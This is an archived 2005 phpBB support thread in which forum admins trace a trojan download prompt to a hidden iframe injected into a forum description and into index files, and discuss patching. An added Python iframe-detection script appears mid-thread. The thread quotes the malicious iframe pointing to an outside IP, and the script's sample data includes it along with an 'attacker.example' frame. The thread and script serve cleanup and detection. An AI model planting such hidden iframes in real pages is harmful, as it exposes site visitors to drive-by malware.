Trojan Downloader

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
DjMaSt3r
Registered User
Posts: 19
Joined: Sun Mar 20, 2005 5:19 pm

Trojan Downloader

Post by DjMaSt3r »

My users are having problems with my forum because it keeps trying to download a trojan from 195.95.218.173

It's called newexpl

The warning I get is as follows:

You have chosen to open newexpl.php which is a : RFC-822 data from: http://195.95.218.173 What should Firefox do with this file? (Firefox being my browser of choice).

-----------------
www.techgadgets4free.com/index.php
Sphen
Registered User
Posts: 524
Joined: Wed May 19, 2004 5:06 pm
Location: Land of the Beaver

Post by Sphen »

Sorry, but I don't get what's happening. Are users being prompted to download this while browsing your forum? If so, it's possible that your forum was compromised. Find out what pages this is happening on, and see if there was any code that might have been added which would do this.

Hope this helps :D

Sphen
I think, therefore I am, I think...
My previous posts are under the name "UberSphen"
DjMaSt3r
Registered User
Posts: 19
Joined: Sun Mar 20, 2005 5:19 pm

Post by DjMaSt3r »

Users are prompted to download it (at least in firefox they are)

It only happens when they click the forum button to go to the forums.

The forums are located here... www.techgadgets4free.com/index.php
Sphen
Registered User
Posts: 524
Joined: Wed May 19, 2004 5:06 pm
Location: Land of the Beaver

Post by Sphen »

I have a question for you. Do you use any JavaScript code, specifically a postamble(); function?

I took a quick look through your HTML output, and that looked a little odd.

Sphen
I think, therefore I am, I think...
My previous posts are under the name "UberSphen"
NeoThermic
Security Consultant
Posts: 2141
Joined: Thu Dec 25, 2003 1:33 am
Location: United Kingdom

Post by NeoThermic »

OK, checking your forum and the source code of the generated pages, your forum entitled 'Got Questions? Ask Here!!' is the infected one.

You need to go to your admin panel, into 'Forum Admin', 'Management', and click 'Edit' for that forum.

In the 'Description' field, you'll see this:

Code: Select all

If you have any questions feel free to ask...but please keep it appropriate. ;)<iframe src="http://195.95.218.173/dl/adv439.php" style="display:none"></iframe>

Remove the stuff starting at <iframe, and click 'Update'.

Then I suggest that you make sure your phpBB version is up to date (2.0.16 as of typing this).

NeoThermic
NeoThermic.com... a well of information. Ask me for the bit bucket so you can drink its goodness. ||新熱です
Gary C
Registered User
Posts: 3
Joined: Mon Jul 11, 2005 3:11 am
Location: Virginia Beach, VA

Post by Gary C »

I had the same problem on two of my websites. On one site, the index.php was modified. On the other site, it was the index.shtml. In both cases, one line of iframe code was inserted. Removing the lines solves the loading issues similar to that described here. And I just now patched both boards to version 16.

Were the OP's site and my sites caught up in some rash of phpBB exploitations? Or do I have a larger security problem?
Last edited by Gary C on Mon Jul 11, 2005 5:36 am, edited 1 time in total.
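The injections described in this thread (a hidden <iframe> pasted into a forum description, and a single iframe line inserted into index.php / index.shtml) share a signature a defender can scan for. The script below is an added example, not code from this thread or from phpBB: it parses HTML fragments (a forum description pulled from the database, or the contents of a web root file) and flags iframes that are hidden by CSS, have zero or one-pixel dimensions, or point at a host outside an allow-list. The sample inputs are constructed; the allow-listed host and the host "attacker.example" are assumptions, and the 195.95.218.173 URL is the one quoted in the thread.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeFinder(HTMLParser):
    """Collect <iframe> tags whose attributes look like a drive-by injection."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = {h.lower() for h in allowed_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        # html.parser lower-cases attribute names; values may be None
        a = {name: (value or "") for name, value in attrs}
        src = a.get("src", "")
        style = a.get("style", "").replace(" ", "").lower()
        reasons = []
        # 1. Hidden via inline CSS (the pattern seen in the forum description)
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden via CSS")
        # 2. Zero- or one-pixel frames are invisible to users but still load
        for dim in ("width", "height"):
            val = a.get(dim, "").strip().lower().rstrip("px")
            if val.isdigit() and int(val) <= 1:
                reasons.append(f"{dim}={val}")
        # 3. Source host not on the site's own allow-list
        host = (urlparse(src).hostname or "").lower()
        if host and host not in self.allowed_hosts:
            reasons.append(f"external host {host}")
        if reasons:
            self.findings.append({"src": src, "reasons": reasons})


def find_suspicious_iframes(html, allowed_hosts=()):
    """Return a list of {'src', 'reasons'} dicts for suspicious iframes in html."""
    finder = IframeFinder(allowed_hosts)
    finder.feed(html)
    finder.close()
    return finder.findings


def scan_texts(named_texts, allowed_hosts=()):
    """Scan several named HTML fragments; return only the ones with findings."""
    report = {}
    for name, html in named_texts.items():
        hits = find_suspicious_iframes(html, allowed_hosts)
        if hits:
            report[name] = hits
    return report


# Constructed sample inputs (not taken from any real database or web root).
SAMPLE_INPUTS = {
    "clean_description": "General chat. Be nice. <b>No spam.</b>",
    # The injection quoted in the thread, appended to a legitimate description
    "infected_description": (
        "If you have any questions feel free to ask...but please keep it appropriate. ;)"
        '<iframe src="http://195.95.218.173/dl/adv439.php" style="display:none"></iframe>'
    ),
    # A zero-size frame of the kind inserted into index.php / index.shtml
    "index_snippet": (
        "<html><body><h1>Welcome</h1>"
        '<iframe src="http://attacker.example/x.php" width="0" height="0"></iframe>'
        "</body></html>"
    ),
    # A visible, same-host frame: legitimate, must not be flagged
    "legit_embed": '<iframe src="http://www.techgadgets4free.com/stats.php" width="300" height="200"></iframe>',
}

if __name__ == "__main__":
    # The site's own hostname is assumed here
    for name, hits in scan_texts(SAMPLE_INPUTS, {"www.techgadgets4free.com"}).items():
        for hit in hits:
            print(f"{name}: {hit['src']} ({', '.join(hit['reasons'])})")
```

In practice the fragments would come from a query over the forum description columns and from reading each file in the web root, and any hit is a reason to check file modification times and admin login history as well as to remove the tag.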
Anon
Former Team Member
Posts: 7019
Joined: Fri Jan 02, 2004 7:33 am
Location: Christchurch, New Zealand

Post by Anon »

Gary C wrote: I had the same problem on two of my websites. On one site, the index.php was modified. On the other site, it was the index.shtml. In both cases, one line of iframe code was inserted. Removing the lines solves the loading issues similar to that described here. And I just now patched both boards to version 16.

Were the OP's site and my sites caught up in some rash of phpBB exploitations? Or do I have a larger security problem?

Sounds like someone used the login bypass hack to get into the admin panel and insert download code into the forum description. Always keep up to date with releases, as they will include security fixes. This applies to other software too, not just phpBB, but Apache, MySQL, PHP etc.
DjMaSt3r
Registered User
Posts: 19
Joined: Sun Mar 20, 2005 5:19 pm

Post by DjMaSt3r »

NeoThermic wrote: OK, checking your forum and the source code of the generated pages, your forum entitled 'Got Questions? Ask Here!!' is the infected one.

You need to go to your admin panel, into 'Forum Admin', 'Management', and click 'Edit' for that forum.

In the 'Description' field, you'll see this:

Code: Select all

If you have any questions feel free to ask...but please keep it appropriate. ;)<iframe src="http://195.95.218.173/dl/adv439.php" style="display:none"></iframe>

Remove the stuff starting at <iframe, and click 'Update'.

Then I suggest that you make sure your phpBB version is up to date (2.0.16 as of typing this).

NeoThermic

That was it, you're awesome :-D

Thanks everyone for the help
Gary C
Registered User
Posts: 3
Joined: Mon Jul 11, 2005 3:11 am
Location: Virginia Beach, VA

Post by Gary C »

Anon wrote: Sounds like someone used the login bypass hack to get into the admin panel and insert download code into the forum description. Always keep up to date with releases, as they will include security fixes. This applies to other software too, not just phpBB, but Apache, MySQL, PHP etc.

That doesn't explain how they could modify the index.shtml. index.php, I'll buy, but not index.shtml.
Anon
Former Team Member
Posts: 7019
Joined: Fri Jan 02, 2004 7:33 am
Location: Christchurch, New Zealand

Post by Anon »

If it was 2.0.10 or earlier it could well have been the highlight exploit that accesses all files.
Gary C
Registered User
Posts: 3
Joined: Mon Jul 11, 2005 3:11 am
Location: Virginia Beach, VA

Post by Gary C »

When the files were modified (Jun 30) I was running 2.0.11 and 2.0.15 on the two boards. The root index.shtml was modified on the site running 2.0.11. The root index.php was modified on the site running 2.0.15.
Brighid
Registered User
Posts: 37
Joined: Sat Feb 12, 2005 7:10 am

Post by Brighid »

So will you be marking this topic as [SOLVED]?